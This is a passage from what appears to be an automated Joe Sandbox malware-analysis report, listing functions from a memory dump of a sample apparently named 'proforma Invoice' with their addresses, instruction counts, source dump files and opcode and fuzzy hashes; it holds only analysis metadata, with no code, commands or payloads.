                                                                          • Opcode ID: d08e34e443c486eb88df93dd26c6b646ea9b0d0914c840a2ec137cd4eee7deab
                                                                          • Instruction ID: 6ab7135ad73a767069dbda8159c2637e60e0934f598b9596abd71d42a533a2f6
                                                                          • Opcode Fuzzy Hash: d08e34e443c486eb88df93dd26c6b646ea9b0d0914c840a2ec137cd4eee7deab
                                                                          • Instruction Fuzzy Hash: 0AA1D575B0071A9FDB2DDF69C590BAABBB1FF58318F444029FA4597282EB34E811CB50
                                                                          Function 01234500 Relevance: .3, Instructions: 275COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 222c060e2c5a78b5ef7a7361e3fd85463642604bb7f09b2e91b306a0f1abd43c
                                                                          • Instruction ID: 719de24e6f22b41d7d19e0cc9b0c43d966e7a5372aba8fd64724ff3a8ff5ca9f
                                                                          • Opcode Fuzzy Hash: 222c060e2c5a78b5ef7a7361e3fd85463642604bb7f09b2e91b306a0f1abd43c
                                                                          • Instruction Fuzzy Hash: 8EA1E1B2A24292DFC716EF18CD80B5ABBE9FF98708F4405A8E6459B750D334ED01CB91
                                                                          Function 011E60E0 Relevance: .3, Instructions: 264COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 948011072a74877740c1b0a19d9264046d7d7320a92b40b9b1100415f436b203
                                                                          • Instruction ID: 1c805eb68fb9974f941e74c133cfb56711d513df56e22bfeb89be6bd769587a2
                                                                          • Opcode Fuzzy Hash: 948011072a74877740c1b0a19d9264046d7d7320a92b40b9b1100415f436b203
                                                                          • Instruction Fuzzy Hash: EC91D071E04616AFDF19CFA8D888BAEBFF5AF58700F554169E614AB341D734E900CBA0
                                                                          Function 0117E3F0 Relevance: .3, Instructions: 261COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 614da2176515e04cfc551f80174c016284d43f9bad9e3e2449221adc856b918c
                                                                          • Instruction ID: f5e9d1684722b9284e0eedc0082fbad44c1153da1e81cf1618d88443869ae319
                                                                          • Opcode Fuzzy Hash: 614da2176515e04cfc551f80174c016284d43f9bad9e3e2449221adc856b918c
                                                                          • Instruction Fuzzy Hash: B6910475A0161ACBEB2C9B68C484BBE7BF1EF94B18F1541A9E906DB340F734D901CB52
                                                                          Function 011B6ACC Relevance: .2, Instructions: 226COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5229874b1f031b0ad053e4d86b30f536f11e740d39079a9765ccc55f786ac16b
                                                                          • Instruction ID: 1db943483246d2592cfbbad8bda9d0ca1ab5df05ae47b0473d1b79fac021f3b1
                                                                          • Opcode Fuzzy Hash: 5229874b1f031b0ad053e4d86b30f536f11e740d39079a9765ccc55f786ac16b
                                                                          • Instruction Fuzzy Hash: 70819371A0061A9BDB1CCF69C990AFEBBF9FB58700F04852EE555E7640E334E940CBA4
                                                                          Function 0122AB40 Relevance: .2, Instructions: 222COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                          • Instruction ID: 91b5a3286d3d357e7a00048b5ebde17e0ae1c1a4cb8d44ea45500517bd3f7898
                                                                          • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                          • Instruction Fuzzy Hash: 2381A531A20216AFDF19CF58C481ABEBBF6FF94310F148569D9169BB85DB74D901CB40
                                                                          Function 01156D10 Relevance: .2, Instructions: 216COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ddeaf1bfaa20aba99f297575867b51960cd47e8cebdf8b12bb4ada28e79d7f78
                                                                          • Instruction ID: e9b29736bd2048adef3758711461374f1d765602027bad92a436fd4ff9934e21
                                                                          • Opcode Fuzzy Hash: ddeaf1bfaa20aba99f297575867b51960cd47e8cebdf8b12bb4ada28e79d7f78
                                                                          • Instruction Fuzzy Hash: FD71A0F560431A9BDB2DCF19C8C0BAEB7E4BB48358F154929EB55D7200E730E946CB92
                                                                          Function 0119E284 Relevance: .2, Instructions: 212COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7c010935da664cbcb1b30cfd1c03765344c0b4a2bf436c6bf3db05736102a2a0
                                                                          • Instruction ID: 8fb3cb230e017a97351f403427eb107e6b9e68554baf8d69884773968df54454
                                                                          • Opcode Fuzzy Hash: 7c010935da664cbcb1b30cfd1c03765344c0b4a2bf436c6bf3db05736102a2a0
                                                                          • Instruction Fuzzy Hash: 09816E71A05609EFDB29CFA9C880BEEBBBAFF48354F104429E565A7250D730AD45CB60
                                                                          Function 0117C640 Relevance: .2, Instructions: 206COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9524ce7526d21183902f4cd292e3466a70ecbeeb86f83b433f67c626b49b029e
                                                                          • Instruction ID: 3bdd8e5536997967243d1bcbda8f6ca313fd50420365bc7e4334afe5c97c73dc
                                                                          • Opcode Fuzzy Hash: 9524ce7526d21183902f4cd292e3466a70ecbeeb86f83b433f67c626b49b029e
                                                                          • Instruction Fuzzy Hash: EB719CB5D046669BCB298F59D8907FEBBB5FF68B10F15415EE942AB350E7309800CBA0
                                                                          Function 011F8D6B Relevance: .2, Instructions: 206COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cc64f7ea6ba26a99f8558957c26e01f375c17caa7b9f2dc2f4f520a76536887c
                                                                          • Instruction ID: b74b3e0513d188160c76e6144e819c27c7e2e01e1f12435f1ad3383c71fc6ea9
                                                                          • Opcode Fuzzy Hash: cc64f7ea6ba26a99f8558957c26e01f375c17caa7b9f2dc2f4f520a76536887c
                                                                          • Instruction Fuzzy Hash: 9E71D1749042669FCB19DF59C840AFEBBF1FF85304F048069EA99DB242E335EA45C7A1
                                                                          Function 0117260B Relevance: .2, Instructions: 201COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f290307f2592ed2d45f1fbb7eff231444187fc68224e4ee71f4127367e82568a
                                                                          • Instruction ID: 81169d46e2e7ef45623eaac18e9808dca3f65158e85dcca997dba4a51105b491
                                                                          • Opcode Fuzzy Hash: f290307f2592ed2d45f1fbb7eff231444187fc68224e4ee71f4127367e82568a
                                                                          • Instruction Fuzzy Hash: A271DF356046428FD31ADF2CC480B2AB7F5FF98314F0585AAE8988B352DB34D946CB92
                                                                          Function 011E035C Relevance: .2, Instructions: 198COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                          • Instruction ID: 73dcd87bd511606da321580f37b662b6ab9732955f318e4082c4ba0496398349
                                                                          • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                          • Instruction Fuzzy Hash: 22718C71A0061AAFDB18DFA9C984EEEBBF8FF48304F104569E505E7250DB70EA41CB90
                                                                          Function 011F62A0 Relevance: .2, Instructions: 198COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: efecb895ef9c665135913eec91af55d1cd2df71b3d14f1815d2e758080936127
                                                                          • Instruction ID: 4e9e1d56263989b9e66563f0af3f0865cdebb52d2727d92299157b780fd5d130
                                                                          • Opcode Fuzzy Hash: efecb895ef9c665135913eec91af55d1cd2df71b3d14f1815d2e758080936127
                                                                          • Instruction Fuzzy Hash: A271E136200B01AFE73AEF18C854F5ABBB6EF40724F15492CE35A8B6A1D775E944CB50
                                                                          Function 01168AA0 Relevance: .2, Instructions: 197COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a6fb0464a4d363789c40901fe48ef25df69e3a2729afcbf22afbe00a73f9d88f
                                                                          • Instruction ID: ea33f0ed2203738b674fea82e2c7e08e320bf23bb8ca3638b789d718ad73a833
                                                                          • Opcode Fuzzy Hash: a6fb0464a4d363789c40901fe48ef25df69e3a2729afcbf22afbe00a73f9d88f
                                                                          • Instruction Fuzzy Hash: D381DF72A183468FDB2CCF9CE488BADB7B6BF58718F16412DD900AB281D7759D41CB90
                                                                          Function 0119CDB1 Relevance: .2, Instructions: 197COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 13486964e06390e425c29cd41f897617a61f302ffd9e5e1278eb537a273fae9b
                                                                          • Instruction ID: 83a788b499d22443867db2a4c0382caed20ebe7569193ff4accc6b33994282a1
                                                                          • Opcode Fuzzy Hash: 13486964e06390e425c29cd41f897617a61f302ffd9e5e1278eb537a273fae9b
                                                                          • Instruction Fuzzy Hash: 0A619D71A002169FDF1DDF68C880BAEBBB5FF48318F15456AE622EB291D7309941CF91
                                                                          Function 0118EDD3 Relevance: .2, Instructions: 166COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 459caeea7a1fb3101b388379efdac5cf07bbb3d900100e634db3361115a1dd3a
                                                                          • Instruction ID: 808138096a5c8cad1f8cb8772a7b48615c84aa4dd8157443168bb2e9c02e4d84
                                                                          • Opcode Fuzzy Hash: 459caeea7a1fb3101b388379efdac5cf07bbb3d900100e634db3361115a1dd3a
                                                                          • Instruction Fuzzy Hash: 8651DB71201752AFDB2CEF59C884B6AB7B9FB5070DF10882EE00283A81D774E845CF92
                                                                          Function 01228DAE Relevance: .2, Instructions: 162COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cd121420655d351d0c26b0885e06c4700221f4fa1bb1d709d6b3a6903daac06e
                                                                          • Instruction ID: 7d6b1f4a021617b3c9fc3358000eeb6fe24afdba14776a35768340f7f74ef200
                                                                          • Opcode Fuzzy Hash: cd121420655d351d0c26b0885e06c4700221f4fa1bb1d709d6b3a6903daac06e
                                                                          • Instruction Fuzzy Hash: B651F472624322AFD711CF28C840BAEB7E5FF94350F04492CFA9597290D774E948CB96
                                                                          Function 0119E443 Relevance: .2, Instructions: 158COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0f917a4c4f341aee51995164566d51cc92acdc9768e9ab566df311f9227203c1
                                                                          • Instruction ID: f2ee6ee898fc65d774fa4eca2799d64c5ebae59866f7a7c0a08179ec6cde966b
                                                                          • Opcode Fuzzy Hash: 0f917a4c4f341aee51995164566d51cc92acdc9768e9ab566df311f9227203c1
                                                                          • Instruction Fuzzy Hash: 9251AD71201A05DFDB2AEF69C980EAAB7F9FF14748F41042AE521C7260E730ED41CB51
                                                                          Function 01204180 Relevance: .2, Instructions: 156COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 37e01a7c9bd02f54c5f389e51ebf2ac0688d15e2ad109b7f019504e6de7552b1
                                                                          • Instruction ID: 32c4a49b3be3fb71292b499e9b509da1cb7404430fe4d953843b558244fd5e79
                                                                          • Opcode Fuzzy Hash: 37e01a7c9bd02f54c5f389e51ebf2ac0688d15e2ad109b7f019504e6de7552b1
                                                                          • Instruction Fuzzy Hash: 69519D716183829FD755EF29C880A6BBBE5FFC8208F548A2DF685C7291D730D905CB52
                                                                          Function 011845B1 Relevance: .2, Instructions: 156COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                          • Instruction ID: dc503b3eb8bb90879cea77a13033fd4ba3106c3c0a9cf773beef0d96a545669b
                                                                          • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                          • Instruction Fuzzy Hash: C451A071E0461AABDF19EF94C440BEEBBB5AF45754F04806AEA01EB240DB34DD44CFA4
                                                                          Function 011EE9E0 Relevance: .2, Instructions: 154COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                          • Instruction ID: 3a82e01367b4a3f800110e6ec79acf5c5b3038acc29ea3920227eadcd7fc6b65
                                                                          • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                          • Instruction Fuzzy Hash: A651E931D01A0AEFDF299FD4C888BAEBBF9AF00318F154625D91267190E7309D44C7A1
                                                                          Function 01228B28 Relevance: .2, Instructions: 152COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cf6078afbdead3873f50b1f506e157cbe92e8d7d3e08ed74cee3aee7f6f67a36
                                                                          • Instruction ID: 84c9c1bfaa94cb74220d712a28fdbd8ced332d894a4c0b350fc4ad7925fc6996
                                                                          • Opcode Fuzzy Hash: cf6078afbdead3873f50b1f506e157cbe92e8d7d3e08ed74cee3aee7f6f67a36
                                                                          • Instruction Fuzzy Hash: 6941D471721622BBD729DB2DC894B7FBBDAEF90620F048219FA55C7281EB74D801C791
                                                                          Function 011ECBF0 Relevance: .1, Instructions: 148COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ce03839f10c08c8348719662055246225666b6fabaf933d52ef6ae3947f87767
                                                                          • Instruction ID: 6b36cdb4f1368c38e308da9831d76c9fd753053d49b57d96d72e23c80024732a
                                                                          • Opcode Fuzzy Hash: ce03839f10c08c8348719662055246225666b6fabaf933d52ef6ae3947f87767
                                                                          • Instruction Fuzzy Hash: 82519B7290061ADFCB28DFA8D8C8AAEBBF9FB48358B514519D505A3704D736AD11CBD0
                                                                          Function 0119A430 Relevance: .1, Instructions: 139COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f328aaa64f9e270fd54d3dbb397357f8a24a5e3e3260e9d916bccbefcaa5a563
                                                                          • Instruction ID: 57cf1dda70ed5263fefb17badb82799c399faa54266dfee76da27f2a48e32bd5
                                                                          • Opcode Fuzzy Hash: f328aaa64f9e270fd54d3dbb397357f8a24a5e3e3260e9d916bccbefcaa5a563
                                                                          • Instruction Fuzzy Hash: 5541DF31740302EBDF2DEE68B8C4B6A3665EB5575CF45002DED1ADB241EBB19884C7A1
                                                                          Function 0122A9D3 Relevance: .1, Instructions: 139COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                          • Instruction ID: 91b5e9da42b5ae429c3b45f92e9f7e974fd08d5e09bfb12fe21113341473d8d6
                                                                          • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                          • Instruction Fuzzy Hash: 8F41D831620727BFD725CF58C984A6EB7B9FF90214B05462EEA528BE40EB30ED04C790
                                                                          Function 011901F8 Relevance: .1, Instructions: 138COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a087479af7d3db5dd8b372b90c950cddb91dcac20ef891289bdf84507707c3b6
                                                                          • Instruction ID: a46f08f3813f3c886330d859c89152b34102b86432417797e2f61026693ab550
                                                                          • Opcode Fuzzy Hash: a087479af7d3db5dd8b372b90c950cddb91dcac20ef891289bdf84507707c3b6
                                                                          • Instruction Fuzzy Hash: 3C419C369002199BDF18DF98C440AEEBBB8BF4C714F15816AF825E7340D735AD41CBA5
                                                                          Function 0118EBFC Relevance: .1, Instructions: 138COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4149cf1943908cec4d602e70fb0f2981ff770631347c20a24048563260d4ab3c
                                                                          • Instruction ID: bfd5ec1bebcc86cf50278d2f32fdaf3056ccd99df980e98c67bfe7c27e4953fa
                                                                          • Opcode Fuzzy Hash: 4149cf1943908cec4d602e70fb0f2981ff770631347c20a24048563260d4ab3c
                                                                          • Instruction Fuzzy Hash: 9841C0716053029FD728EF28C884A6BB7F9FB98228F11892DE957C3711DB35E8458B51
                                                                          Function 011A2750 Relevance: .1, Instructions: 137COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                          • Instruction ID: 24d39085a22709aa9c95363b1bf70c66e8ac2838162fd489dfc9c057c8281817
                                                                          • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                          • Instruction Fuzzy Hash: 19515A75A00615DFCB19CF9CC580AAEF7B2FF84724F2881A9D915A7351D770AE42CB90
                                                                          Function 01166154 Relevance: .1, Instructions: 133COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 93a68f7932f543fe0f3d9704c0b2eb30d4523d1c00de874b8f17676442c5ca22
                                                                          • Instruction ID: 2428021a36cd43582dc2a38fc9f14c01f2046689eea48142af46f87cd769f4c6
                                                                          • Opcode Fuzzy Hash: 93a68f7932f543fe0f3d9704c0b2eb30d4523d1c00de874b8f17676442c5ca22
                                                                          • Instruction Fuzzy Hash: E9511570900256DBDB2DCB28CC44BE8BBB9EF15318F1482A9E529976D1E735A991CF80
                                                                          Function 01160BCD Relevance: .1, Instructions: 130COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ba7c485c3f753e93ee441d9cde408dc3a83dfb62f9cbdf64d954c43f82ec2690
                                                                          • Instruction ID: 32b883d0510ade98d2a4aba0b198cbec39f3d4608325a72197fcde96e653ff3a
                                                                          • Opcode Fuzzy Hash: ba7c485c3f753e93ee441d9cde408dc3a83dfb62f9cbdf64d954c43f82ec2690
                                                                          • Instruction Fuzzy Hash: DC419035A012289FDB29DF68C980BEE77B8FF49740F4100A6E908AB241D775DE81CF91
                                                                          Function 01160D59 Relevance: .1, Instructions: 130COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 36b4c8b5e0c4f86d55ea05dbf4980988a8863a29cbc8c88a249a16078a6e7aff
                                                                          • Instruction ID: 7b5f732b763b47d68e19e7e662bd524cf9ccf2c274ab3732a94db053f357fdd4
                                                                          • Opcode Fuzzy Hash: 36b4c8b5e0c4f86d55ea05dbf4980988a8863a29cbc8c88a249a16078a6e7aff
                                                                          • Instruction Fuzzy Hash: D041E575600328AFEB29DF24CC80BAAB7ADAB54614F00449AF94597281D776ED50CB52
                                                                          Function 0122866E Relevance: .1, Instructions: 129COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                          • Instruction ID: 8ec440d41432129b10e676820af2d49065b8e406257b4f07b00eb7315dbfbaa5
                                                                          • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
